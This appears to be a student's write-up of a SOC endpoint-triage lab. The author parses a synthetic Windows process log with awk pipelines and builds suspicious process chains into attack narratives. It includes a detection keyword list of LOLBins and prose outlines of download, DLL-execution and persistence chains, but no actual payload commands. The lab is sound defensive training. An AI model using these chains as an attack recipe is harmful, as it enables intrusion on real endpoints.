đź§Ş Lab Objective

Practice SOC-style endpoint triage on a synthetic process creation dataset by using Linux pipelines to answer:

  • Which parent → child process chains are suspicious?
  • Which users / hosts are involved?
  • Which commands were actually run?
  • How to pivot from one suspicious event into a larger attack story?

đź§° Lab Setup

Dataset

I created a fake Windows-style endpoint process log (proc_events.log) with pipe-delimited fields:

  1. timestamp
  2. host
  3. user
  4. parent process
  5. child process
  6. command line

The dataset intentionally includes:

  • normal-ish admin/dev activity
  • suspicious Office/browser → shell / LOLBin chains
  • persistence indicators (reg.exe, schtasks.exe)
  • web-server process spawning shells (w3wp.exe -> cmd.exe -> powershell.exe)

This makes it useful for learning triage patterns without real-world noise.


❓Questions I Practiced Answering

  • Which parent→child combinations happen most often?
  • Which events contain likely shells / script hosts / LOLBins?
  • Which hosts and users are associated with suspicious chains?
  • Which child processes are rare in this dataset?
  • Are there URLs in command lines, and what domains/URLs appear?
  • Can I reconstruct a plausible attack narrative for a host?

🛠️ What I Did (Step-by-Step)

1) Built the sample process log

I created proc_events.log using a heredoc and included multiple host/user scenarios:

  • WS-FIN-07 (Office → PowerShell → certutil → rundll32)
  • WS-SALES-12 (Outlook/Excel → cmd → PowerShell → reg/schtasks)
  • WS-MKT-05 (Edge → mshta → PowerShell)
  • SRV-WEB-01 (w3wp.exe → shell chain)
  • WS-ENG-02 (developer-ish activity: code → PowerShell → Python → curl)
  • WS-IT-01 (admin-ish activity: MMC → PowerShell → WMIC)

This was the foundation for all later pivots.


2) Inspected the data format before parsing

I used head to inspect the first rows and confirm the structure.

head -5 proc_events.log

Why this mattered

I initially (accidentally) used whitespace-based parsing on the process log and got broken results because the command line field contains spaces.

That was a good reminder of the rule:

Always inspect format first. Then choose the parser.


3) Switched to the correct parser: awk -F'|'

I verified field positions by printing one row with field numbers:

head -1 proc_events.log | awk -F'|' '{for(i=1;i<=NF;i++) print i, $i}'

This confirmed:

  • $4 = parent process

  • $5 = child process

  • $6 = command line

This was the key fix that made the rest of the lab work correctly.


4) Counted parent → child process combinations

I built the first real triage view:

awk -F'|' '{print $4 " -> " $5}' proc_events.log | sort | uniq -c | sort -nr

What this does

  • extracts parent+child

  • groups identical chains

  • counts frequency

  • ranks them

Why it matters

This turns raw process events into a behavior map.


5) Filtered for likely interesting children (shells / LOLBins / script hosts)

I filtered on the child process field ($5) for things like:

  • cmd.exe

  • powershell.exe

  • mshta.exe

  • rundll32.exe

  • certutil.exe

  • wmic.exe

  • reg.exe

  • schtasks.exe

This let me quickly isolate higher-value events without losing the full line context.


6) Filtered suspicious parent + child combinations

I then focused on high-signal combos like:

  • Office / browser / script-host parents spawning:

    • shells

    • LOLBins

    • script engines

This produced the clearest “triage-worthy” subset of events.

Examples that popped out:

  • winword.exe -> powershell.exe

  • excel.exe -> cmd.exe

  • msedge.exe -> mshta.exe

  • mshta.exe -> powershell.exe


7) Reformatted suspicious events into a triage-friendly summary line

I used awk to print events in a much more readable form:

  • HOST=...

  • USER=...

  • parent -> child

  • CMD=...

This made the output feel more like an analyst note than raw logs.


8) Pivoted by host to reconstruct stories

I pivoted on hosts like:

  • WS-FIN-07

  • WS-SALES-12

This was the point where the “raw events are narrative fragments” idea really clicked.

Instead of isolated lines, I could see sequences of actions.


9) Counted rare child processes

I ranked child processes by ascending frequency:

awk -F'|' '{print $5}' proc_events.log | sort | uniq -c | sort -n

This helped surface the idea that:

In security, rare can be more valuable than “top N”.

Examples of rare (count = 1 in this dataset):

  • mshta.exe

  • reg.exe

  • schtasks.exe

  • wmic.exe

  • curl.exe

  • python.exe


10) Counted suspicious activity by user and by host

I grouped suspicious parent→child matches by:

  • user

  • host

This helped answer:

  • is this concentrated on one system?

  • are multiple users involved?

  • what is the scope?


11) Extracted URLs from command lines

I filtered command lines containing http:// or https://, then extracted rough URLs.

This linked endpoint process behavior to network indicators like:

  • payload download URLs

  • check-in URLs

  • internal portal URL

  • GitHub API call (likely benign in dev context)


📊 Key Results / Findings

Parent → child frequency (top observation)

The most common chain in this dataset was:

  • cmd.exe -> powershell.exe (4 times)

This alone is not proof of compromise, but it’s a useful pattern to inspect in context.

Other notable chains:

  • powershell.exe -> certutil.exe (2 times)

  • multiple one-off high-signal chains such as:

    • winword.exe -> powershell.exe

    • msedge.exe -> mshta.exe

    • cmd.exe -> rundll32.exe

    • w3wp.exe -> cmd.exe


Rare child process counts (useful for signal)

Rare children (count = 1) included:

  • curl.exe

  • excel.exe

  • msedge.exe

  • mshta.exe

  • python.exe

  • reg.exe

  • schtasks.exe

  • wmic.exe

This reinforced an important SOC lesson:

Rare process names or chains can be higher-value signals than common admin tools.


Suspicious host distribution (from filtered parent→child combos)

The suspicious-chain grouping showed multiple affected hosts, with WS-MKT-05 appearing more than once in the filtered set.

This supports the “scope” question:

  • one host = maybe isolated

  • multiple hosts = broader campaign possibility (or multiple scenarios in a training dataset)


🕵️ Triage Narratives Reconstructed (Most Important Part)

1) WS-FIN-07 / user mario — likely malware execution chain

Observed sequence:

  • winword.exe -> powershell.exe (encoded/hidden-looking PowerShell)

  • powershell.exe -> cmd.exe (whoami, ipconfig /all) = recon

  • powershell.exe -> certutil.exe (download external payload to temp)

  • cmd.exe -> rundll32.exe (execute DLL from user temp)

  • rundll32.exe -> powershell.exe (network check-in / web request)

Why this is suspicious

This chain matches a classic pattern:
Office-triggered execution → recon → payload download → DLL execution → callback


2) WS-SALES-12 / user andrea — likely phishing + persistence

Observed sequence:

  • outlook.exe -> excel.exe (attachment workflow)

  • excel.exe -> cmd.exe

  • cmd.exe -> powershell.exe (download/execute style command)

  • powershell.exe -> reg.exe (Run key persistence in HKCU)

  • powershell.exe -> schtasks.exe (scheduled task persistence)

Why this is suspicious

This chain strongly suggests:
email/document execution → PowerShell → persistence establishment


3) WS-MKT-05 / user sara — browser → mshta → PowerShell

Observed sequence:

  • msedge.exe -> mshta.exe (remote HTA URL)

  • mshta.exe -> powershell.exe (download/execute style command)

Why this is suspicious

mshta.exe is a classic LOLBin and very often suspicious in browser-driven chains, especially when calling remote URLs.


4) SRV-WEB-01 / user svc_iis — web server shell chain (high severity)

Observed sequence:

  • w3wp.exe -> cmd.exe

  • cmd.exe -> powershell.exe

  • powershell.exe -> certutil.exe

  • powershell.exe -> rundll32.exe

Why this is suspicious

A web server worker process spawning shells + LOLBins is a strong indicator of:

  • web shell behavior

  • command execution through the web app

  • exploitation of a vulnerable application

This would be high-priority triage in a real SOC.


⚠️ Mistakes I Made (and Why They Were Valuable)

1) Parsing with the wrong delimiter

I initially treated the log like space-delimited text and got bad field extraction because the command line field includes spaces.

âś… Fix:

  • switched to awk -F'|'

Takeaway: always identify the true delimiter first.


2) Pasting explanatory text into the shell

Several lines from notes/explanations were pasted directly into Bash, producing:

  • command not found

  • syntax errors

  • noise in the raw session log

âś… Fix:

  • separated “commands to run” from “explanatory text”

  • used echo only when intentionally printing notes

Takeaway: in labs, copy only the executable parts.


3) Typos while re-running commands

Examples like accidental merged commands (head -5 proc_events.lohead ...) created noisy output.

âś… Fix:

  • slowed down and re-ran correctly

  • used head + field-checking again to re-anchor

Takeaway: when output gets weird, restart from:

  • head

  • field mapping

  • one pipeline at a time


đź§  What I Learned

Technical

  • How to parse pipe-delimited endpoint process telemetry with awk -F'|'

  • How to count parent → child chains with sort | uniq -c

  • How to pivot by:

    • host

    • user

    • child process

    • command line URL presence

  • How to use rare-process counting as a signal-finding technique

SOC thinking

  • Process name is a clue, not a verdict

  • Parent → child adds major context quickly

  • Command line often reveals the actual behavior

  • Counting/grouping creates evidence

  • Raw logs become a story only after pivoting and aggregation


đź”— Key Cybersecurity Connections

This lab directly reinforced concepts useful for:

  • SOC triage

  • endpoint detection reasoning

  • process-chain hunting

  • LOLBin awareness

  • incident narrative building

It also reinforced why Linux pipelines feel like a mini-SIEM:

  • filter

  • extract

  • group/count

  • rank

  • interpret


⏭️ Next Steps

  1. Re-run the same lab from memory (especially awk -F'|' workflows)

  2. Build a one-page cheat sheet of suspicious parent→child chains

  3. Extend the dataset with:

    • benign Office behavior

    • more admin workflows

    • browser downloads that are actually normal

  4. Practice extracting:

    • domains (not just URLs)

    • file paths in temp/user profile

    • persistence indicators

  5. Translate one or two findings into detection logic ideas (Sigma / Splunk / KQL later)


🪞 Reflection

This was one of the most useful labs so far because it connected:

  • Linux parsing skills

  • SOC pivots

  • process vocabulary

  • investigation thinking

The biggest win was not the commands themselves — it was learning how to turn process events into a timeline/story.

Also, the mistakes (bad delimiter, pasted note text into shell) were actually useful because they forced me to debug my workflow and reinforce the “inspect first, parse second” habit.


Lessons Learned

What worked

  • Using a synthetic but realistic dataset

  • Verifying field positions before building pipelines

  • Counting parent→child combos early

  • Pivoting by host to reconstruct attack narratives

  • Looking at rare child processes, not just common ones

What broke

  • Parsing assumptions (space-delimited thinking)

  • Copy/paste discipline (notes vs commands)

  • Typos that created noisy shell output

Why it broke

  • The command line field contains spaces, so default awk parsing was wrong

  • I mixed explanatory text with executable commands during practice

  • I was moving fast and chaining too much before re-checking output

Fix / takeaway

  • Start every new log with: head + delimiter check + field mapping

  • Use awk -F'|' for this dataset consistently

  • Keep notes separate from commands (or prefix notes safely with echo)

  • If output looks wrong, reset and rebuild one pipeline at a time